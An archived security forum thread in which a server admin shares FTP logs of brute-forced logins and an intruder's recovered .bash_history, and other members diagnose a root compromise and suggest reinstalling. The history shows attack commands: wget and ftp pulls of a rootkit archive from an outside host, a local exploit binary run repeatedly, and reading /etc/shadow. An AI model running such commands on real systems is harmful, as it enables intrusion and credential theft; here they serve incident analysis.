Page 1 of 3 123 LastLast
Results 1 to 10 of 30

Thread: Suspicious log

  1. #1
    Senior Member
    Join Date
    Dec 2002
    Posts
    144

    Suspicious log

    Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:11 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
    Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:12 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
    Nov 17 08:54:13 hosting pure-ftpd[13737]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:14 hosting pure-ftpd[13724]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:15 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:16 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:50 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:55 hosting pure-ftpd[13929]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:55 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    Nov 17 08:54:56 hosting pure-ftpd[13936]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
    Nov 17 08:54:57 hosting pure-ftpd[13936]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
    N
    ----
    Nov 17 09:39:50 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] New connection from 210.195.36.227
    Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
    Nov 17 09:39:54 hosting pure-ftpd[25356]: (rootbeer@210.195.36.227) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 09:44:53 hosting named[2053]: client 218.111.217.111#2671: update 'lanfar.com.my/IN' denied
    Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] New connection from 127.0.0.1
    Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] Logout - CPU time spent: 0.000 seconds.
    Nov 17 09:50:12 hosting named[2053]: client 218.111.217.111#2827: update 'lanfar.com.my/IN' denied
    Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] New connection from 210.186.130.187
    Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
    Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/str00351117095203.zipx u
    ploaded (144892 bytes, 3.11KB/sec)
    Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] File successfully renamed or moved: [str0035111
    7095203.zipx]->[str00351117095203.zip]
    Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [INFO] Logout - CPU time spent: 0.010 seconds.



    based on the log above.. can we say that someone is spooling an IP address and trying to logon to the box using rootbeer user id? there is a lot of this type of log.. for the entire day.. what shd i do? what is he trying to do?
    BlAcKiE
    GearBlitz

  2. #2
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,744
    Do you have a registered user for the box called Rootbeer?.. yes well it looks like a remote log in....by pharting around with proxies..

    If you don't have a user called Rootbeer...YOU DO NOW....in other words rooted... now I will sit back, watch and learn..

    cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  3. #3
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    grab the zipfile......

    Sit back and watch, grab anything else they put there. Popping a packet sniffer like Ethereal on the box would be nice too..... Just watch for outbound connections. When they start, mess with them for a while then kill the hack....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  4. #4
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Und3ertak3r already noted it. You seem to have a user named rootbeer. If you didn't create it you're screwed. If it is an account you've created, it probably has a simple password. Someone may have bruteforced that password (those are the authentication failed log entries). By using different proxies (source addresses in your logs) your attacker hopes you won't notice it.

    Because it's a TCP connection you can probably rule out TCP/IP spoofing. Spoofing a fully blown TCP connection is next to impossible to do over the Internet. Heck, it's hard enough to do in a lab environment.

    I'd definitely check out that zipfile. It may contain some tools your attacker plans on using..
    This might give you an edge, so it'll be easier to guess what your attacker will do next.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  5. #5
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    have anyone tried this?
    wget sonkeriki.front.ru/sk.tar.gz
    BlAcKiE
    GearBlitz

  6. #6
    Junior Member
    Join Date
    Nov 2001
    Posts
    20
    Just did
    this excerpt of the contenets should day it all
    Hello, dear friend
    I have two news for you. Bad one and the bad one:
    First, it seems that someone installed rootkit
    on your system...
    Second, is the fact that I can't execute (errno=%d)
    original /sbin/init binary!
    And reason why I am telling you this is
    that I can't live without this file. It's just
    kinda of symbiosis, so, boot from clean floppy,
    mount root fs and repair /sbin/init from backup.

    (and install me again, if you like :P)

    Best regards,
    your rootkit .. SoNkErIkI Say`s Have a nice day!
    taken from the sk file in the tar
    \" I love fools and mistakes i\'m alway\'s making them \" (Charles Darwin)

  7. #7
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Penguin, did you find a reference to that sk.tar.gz file on your system?
    If you did, you're definitely 0wn3d

    Take the system off-line, backup your data and reinstall everything from original media. Yes, this means nuking your system, there's no way to tell what else "they" may have touched without doing some serious forensic analysis... And don't forget to update your system before putting it online again.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  8. #8
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    how do i find the file?
    i cant find the file..
    it seems like deleted..

    this is the .bash_history file

    w
    ping www.yahoo.com
    cd /tmp
    cd /var/tmp
    ls -al
    cd /tmp
    ftp sonkeriki.front.ru
    bye
    ls -al
    cd /tmp
    tar xvf pt.tar
    ./pt
    ./pt
    id
    id
    id
    id
    id
    id
    id
    id
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    ./pt
    w
    who
    rm -rf pt pt.tar
    ls -al
    id
    ps x
    w
    w
    pwd
    cd .X11-unix/
    ls -al
    ftp sonkeriki.front.ru
    tar xzvf p.tar.gz
    PATH=.:$PATH
    sh
    cd ..
    exit
    bash
    clear
    exit
    w
    cd /tmp
    cd .X11-unix/
    ls -al
    rm -rf p.tar.gz
    ls -al
    mv psybnc .X11-unix
    ls -al
    cd .X11-unix
    make
    a
    a
    pwd
    ls -al
    mv psybnc sh
    ls -al
    hostname
    sh
    clear
    exit
    w
    cat /etc/host
    cat /etc/hosts
    ifconfig
    /sbin/ifconfig -a
    uptime
    ping www.yahoo.com
    cd /tmp
    ping www.yahoo.com
    clear
    exit
    hostname
    vhost
    vhosts
    ifconfig
    /sbin/ifconfig -a
    cat /etc/hosts
    id
    ls -al
    cd /home
    ls -al
    cat /etc/shadow
    cd /tmp
    ls -al
    su
    wget sonkeriki.front.ru/sk.tar.gz
    ls -al
    tar xzvf sk.tar.gz
    rm -rf download.php?URL=sonkeriki.front.ru%2Fsk.tar.gz
    ls -al
    cd /tmp
    ls -al

    what do u all think?
    BlAcKiE
    GearBlitz

  9. #9
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    Originally posted here by recca
    Just did
    this excerpt of the contenets should day it all


    taken from the sk file in the tar
    hey.. how did u do it? i cannot gunzip the file after downloading it..
    BlAcKiE
    GearBlitz

  10. #10
    Junior Member
    Join Date
    Nov 2004
    Posts
    13
    I'm just curious how this person gained "root" level access via your FTP site. Was some form of buffer-overflow exploited in addition to the FTP account brute-forcing? Also.. I assume you HAD to have had an account named "rootbeer" to be cracked by password grinding.

    For knowledge sake, I'd suggest you determine if your FTP server (based on its revision) is succeptible to buffer overflow exploits, as I'm not aware of any native FTP based methods of gaining root.

    And finally - based on your .bash_history, looks like somebody's staging some great files to play with on your site and is definately looking at setting up some sort of server-based process (hence all the pinging to yahoo.com and reviewing of your network config (ifconfig).

    Good luck!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •